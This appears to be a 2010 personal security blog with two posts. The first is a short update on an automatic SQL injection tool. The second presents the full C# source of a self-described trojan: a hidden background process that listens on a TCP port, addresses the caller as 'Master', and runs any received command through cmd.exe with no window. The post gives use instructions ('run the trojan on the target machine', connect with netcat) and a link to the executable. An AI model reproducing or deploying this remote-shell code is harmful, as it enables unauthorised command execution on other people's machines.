Thursday, May 20, 2010

Automatic SQL injection tool update

Hi folks! This is an update about the automatic SQL injection tool I started developing.
My first intention was to develop a simple automatic injection tool, then when I started developing it I found it to be far from simple. That is why I decided to join forces with my colleague Raviv Raz who previously developed Multinjector. We intend to greatly improve and extend its functionality. You can read all about it at Raviv's blog. Updates and code reviews will be posted by me later on.

Have a good weekend,
-Herzel

Saturday, May 1, 2010

My own C# trojan - remote shell command execution

In this post I will present you a simple "shell" I created using c#.NET.
The trojan runs in the background, opens a listening port on the machine running it and allows any connected client to execute remote shell commands.
This application is for educational purposes only (mostly my own).

how to use it?

Simply run the trojan on the target machine and connect to it through port 13000 using telnet or netcat. After the connection had established, you may execute any shell command on the target machine:











code:
[STAThread]
        static void Main()
        {
            ProcessStartInfo processInfo;
            Process process;
            TcpListener server = null;
            bool isFirst = true;

            try
            {
                // Set the TcpListener on port 13000.
                Int32 port = 13000;
                // Set the server to run locally
                IPAddress localAddr = IPAddress.Parse("127.0.0.1");
                server = new TcpListener(localAddr, port);
                // Start listening for client requests.
                server.Start();
                // Buffer for reading data
                Byte[] bytes = new Byte[256];
                String command = null;
                int i;
                string recv_char;
                byte[] msg;
                // Perform a blocking call to accept requests.
                TcpClient client = server.AcceptTcpClient();
                // Get a stream object for reading and writing
                NetworkStream stream = client.GetStream();
                // Say hello
                msg = System.Text.Encoding.ASCII.GetBytes("Welcome Master! enter a command to execute or enter exit:\r\n");
                stream.Write(msg, 0, msg.Length);

                // Enter the listening loop.
                while (true)
                {
                    if (!isFirst)
                    {
                        msg = System.Text.Encoding.ASCII.GetBytes("Enter a command:\r\n");
                        stream.Write(msg, 0, msg.Length);
                    }
                    // reset the command                                        
                    command = null;                                        

                    // Loop to receive all the data sent by the client.
                    while ((i = stream.Read(bytes, 0, bytes.Length)) != 0)
                    {                        
                        // Translate data bytes to a ASCII string.
                        recv_char = System.Text.Encoding.ASCII.GetString(bytes, 0, i);
                        command += recv_char;
                        if (command.Contains("\n"))
                            break;
                    }
                    if (command.Equals("exit\r\n"))
                    {
                        // If exit entered shutdown and end connection
                        msg = System.Text.Encoding.ASCII.GetBytes("Bye Bye Master...\r\n");
                        stream.Write(msg, 0, msg.Length);
                        client.Close();
                        break;
                    }
                    // execute the command received (/C to terminate process after execution):
                    processInfo = new ProcessStartInfo("cmd.exe", "/C " + command);
                    processInfo.CreateNoWindow = true; // don't open a window
                    processInfo.RedirectStandardOutput = true; // don't show output
                    processInfo.UseShellExecute = false; // don't use a shell
                    process = Process.Start(processInfo); // start the process                    
                    string output = process.StandardOutput.ReadToEnd();
                    process.Close(); // close the process 
                    isFirst = false;                   
                    if (output != null)
                    {
                        msg = System.Text.Encoding.ASCII.GetBytes(output + "\n");
                        // Send back a response.
                        stream.Write(msg, 0, msg.Length);
                    }
                    else
                    {
                        msg = System.Text.Encoding.ASCII.GetBytes("Sorry Master, command execution failed\r\n");
                        // Send back a response.
                        stream.Write(msg, 0, msg.Length);
                    }                    
                }                
            }
            catch
            {
                // do nothing
            }
            finally
            {
                // Stop listening for new clients.
                server.Stop();
            }
        }        
You may download the executable file from here.
Oh.. and don't forget to kill that process when you finish playing with it :)

-herzel